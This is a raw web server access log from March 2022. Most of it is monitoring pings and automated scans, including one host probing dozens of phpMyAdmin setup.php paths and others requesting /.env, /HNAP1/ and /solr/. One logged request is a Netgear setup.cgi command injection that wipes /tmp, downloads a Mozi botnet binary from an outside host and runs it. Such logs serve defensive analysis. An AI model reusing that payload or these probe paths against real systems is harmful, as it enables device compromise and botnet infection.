209.141.61.19 - - [01/Mar/2022:07:33:22 +0100] "GET http://212.91.246.81:80typo3/phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:23 +0100] "GET http://212.91.246.81:80web/phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:23 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:24 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.0.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:24 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:25 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:25 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.1.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:26 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.10.2.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:26 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.11.0.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:26 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.11.1.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:27 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.11.1.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:27 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:28 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.11.1-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:28 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:29 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:29 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:29 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.5-rc1config/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:30 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:30 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:31 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:31 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:32 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:32 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:32 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:33 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:33 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:34 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.6.9/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:34 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:34 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:35 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:35 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:36 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:36 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:36 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.7.7/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:37 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:37 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.2.3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:38 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:38 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:39 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.4/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:39 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:40 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:40 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.7/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:41 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.8/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:41 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.8.9/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:41 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.0.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:42 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.0.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:42 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.0-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:43 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:43 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:44 +0100] "GET http://212.91.246.81:80phpMyAdmin-2.9.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:44 +0100] "GET http://212.91.246.81:80phpmyadmin2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:44 +0100] "GET http://212.91.246.81:80phpMyAdmin2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:45 +0100] "GET http://212.91.246.81:80phpmyadmin2/scripts/setup.phpwww.hand.org.hu HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:45 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:46 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.0.0-rc1-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:46 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.0.1.0-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:47 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.0.1.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:47 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:48 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.0.0-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:48 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.0.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
45.137.23.152 - - [01/Mar/2022:07:33:48 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
209.141.61.19 - - [01/Mar/2022:07:33:48 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.1.0-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:49 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:49 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.2.0-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:50 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.1.2.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:50 +0100] "GET http://212.91.246.81:80phpMyAdmin-3.4.3.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:51 +0100] "GET http://212.91.246.81:80phpMyAdmin3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:51 +0100] "GET http://212.91.246.81:80phpMyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:52 +0100] "GET http://212.91.246.81:80phpmy/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:52 +0100] "GET http://212.91.246.81:80php/phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:53 +0100] "GET http://212.91.246.81:80php/phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:53 +0100] "GET http://212.91.246.81:80_pma/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:54 +0100] "GET http://212.91.246.81:80sqladmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:54 +0100] "GET http://212.91.246.81:80sql/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:55 +0100] "GET http://212.91.246.81:80tools/phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:55 +0100] "GET http://212.91.246.81:80webapps/phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:56 +0100] "GET http://212.91.246.81:80webdb/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:07:33:56 +0100] "GET http://212.91.246.81:80websql/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
45.137.23.152 - - [01/Mar/2022:07:34:10 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [01/Mar/2022:07:34:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:35:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:36:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:37:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:38:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:39:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:40:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:41:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:42:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:43:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.73.215.171 - - [01/Mar/2022:07:43:58 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2022:07:44:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:45:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:46:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:47:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:48:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.31.98.144 - - [01/Mar/2022:07:48:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.31.98.144 - - [01/Mar/2022:07:48:44 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Mar/2022:07:49:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.73.215.171 - - [01/Mar/2022:07:49:25 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2022:07:50:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:51:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:52:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:53:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:54:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:55:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:56:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:57:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:58:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:07:59:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:00:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:01:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
182.113.233.205 - - [01/Mar/2022:08:02:08 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
212.91.246.72 - - [01/Mar/2022:08:02:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.31.98.144 - - [01/Mar/2022:08:02:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.31.98.144 - - [01/Mar/2022:08:02:25 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Mar/2022:08:03:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.134.170 - - [01/Mar/2022:08:03:23 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:08:04:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:05:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:06:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:07:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.218.206.66 - - [01/Mar/2022:08:08:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
27.147.161.38 - - [01/Mar/2022:08:08:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Mar/2022:08:08:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.103.123 - - [01/Mar/2022:08:09:15 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:08:09:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:10:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:11:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
201.150.173.225 - - [01/Mar/2022:08:11:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:08:12:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:13:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:14:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:15:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:16:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:17:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:18:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.73.215.171 - - [01/Mar/2022:08:19:12 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2022:08:19:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:20:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:21:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:22:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.8.171.193 - - [01/Mar/2022:08:23:15 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2022:08:23:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:24:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.8.171.193 - - [01/Mar/2022:08:24:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2022:08:25:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:26:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:27:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.224.240.8 - - [01/Mar/2022:08:27:29 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.224.240.8:37885/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
218.166.133.188 - - [01/Mar/2022:08:28:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
191.8.171.193 - - [01/Mar/2022:08:28:04 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2022:08:28:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.8.171.193 - - [01/Mar/2022:08:28:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
191.8.171.193 - - [01/Mar/2022:08:29:19 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2022:08:29:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.8.171.193 - - [01/Mar/2022:08:29:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
191.8.171.193 - - [01/Mar/2022:08:29:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
191.8.171.193 - - [01/Mar/2022:08:29:50 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2022:08:30:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.221.192.26 - - [01/Mar/2022:08:31:03 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:08:31:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.8.171.193 - - [01/Mar/2022:08:31:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
104.206.128.26 - - [01/Mar/2022:08:31:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
212.91.246.72 - - [01/Mar/2022:08:32:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:33:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.8.171.193 - - [01/Mar/2022:08:33:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2022:08:34:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
